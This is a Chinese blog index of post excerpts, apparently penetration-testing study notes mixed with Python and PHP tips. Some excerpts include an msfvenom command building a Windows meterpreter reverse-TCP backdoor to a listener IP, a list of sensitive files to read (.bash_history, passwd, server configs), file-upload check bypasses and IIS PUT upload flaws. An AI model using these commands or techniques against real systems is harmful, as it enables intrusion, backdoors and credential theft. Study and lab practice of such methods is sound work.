摘要: pip-review 基本使用方法: pip install pip-review #查看可更新 pip-review #自动批量升级 pip-review --auto #以交互方式运行,对每个包进行升级 pip-review --interactive 阅读全文
posted @ 2022-06-06 13:52 拾瑾 阅读(128) 评论(0) 推荐(0) 编辑
摘要: 1. 制作Windows恶意软件 1.1 使用msfvenom生成后门木马 制作后门程序 sudo msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.142.135 LPORT=44 阅读全文
posted @ 2021-12-21 23:57 拾瑾 阅读(444) 评论(1) 推荐(0) 编辑
摘要: zipfile zipfile模块基本使用 #使用 zipfile 压缩文件 import zipfile #创建一个zip文件对象,压缩是需要把mode改为‘w’ zfile=zipfile.ZipFile("test.zip","w") #将文件写入zip文件中,即将文件压缩 zfile.wri 阅读全文
posted @ 2021-12-11 16:18 拾瑾 阅读(53) 评论(0) 推荐(0) 编辑
摘要: 关于开启msfconsole遇到数据库连接的问题 首先,确认一下,postgresql 服务是否已经启动。 如未启动,输入 service postgresql start kali用下面这句命令 /etc/init.d/postgresql start 如果不奏效,在msf中直接使用msfdb d 阅读全文
posted @ 2021-11-26 17:44 拾瑾 阅读(725) 评论(0) 推荐(0) 编辑
摘要: 原文链接:https://www.cnblogs.com/keta/p/9469417.html 方法1: 用 file_get_contents 以get方式获取内容: <?php $url = 'https://wenda.shukaiming.com/'; echo file_get_cont 阅读全文
posted @ 2021-11-19 16:32 拾瑾 阅读(226) 评论(0) 推荐(0) 编辑
摘要: 原文链接:https://www.freebuf.com/vuls/304741.html IIS 6.x 攻防详解 IIS写权限漏洞 开启webDAV引起的IIS写权限漏洞(攻击者可以上传文件) PUT任意上传漏洞 改为允许,并开启脚本资源访问和写入 使用工具已经可以检测出漏洞 修改来宾用户权限 阅读全文
posted @ 2021-11-17 14:48 拾瑾 阅读(464) 评论(1) 推荐(0) 编辑
摘要: 文件上传 1. 文件类型检测绕过 1.1. 更改请求绕过 有的站点仅仅在前端检测了文件类型,这种类型的检测可以直接修改网络请求绕过。 同样的,有的站点在后端仅检查了HTTP Header中的信息,比如 Content-Type 等,这种检查同样可以通过修改网络请求绕过。 1.2. Magic检测绕过 阅读全文
posted @ 2021-11-08 14:34 拾瑾 阅读(104) 评论(0) 推荐(0) 编辑
摘要: 文件读取 考虑读取可能有敏感信息的文件 用户目录下的敏感文件 .bash_history .zsh_history .profile .bashrc .gitconfig .viminfo passwd 应用的配置文件 /etc/apache2/apache2.conf /etc/nginx/ngi 阅读全文
posted @ 2021-11-08 14:12 拾瑾 阅读(39) 评论(0) 推荐(0) 编辑
摘要: 1.设置请求头 --random-agent --user-agent="User-Agent':'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" --user-agent="M 阅读全文
posted @ 2021-10-25 15:48 拾瑾 阅读(263) 评论(0) 推荐(0) 编辑
摘要: 通过微博图片链接可以直接找到发图的人 例: 图片地址: https://tvax1.sinaimg.cn/crop.0.0.1080.1080.180/63885668ly8geyrcrw0zjj20u00u0mz6.jpg?KID=imgbed,tva&Expires=1620073273&ssi 阅读全文
posted @ 2021-10-11 14:53 拾瑾 阅读(495) 评论(0) 推荐(0) 编辑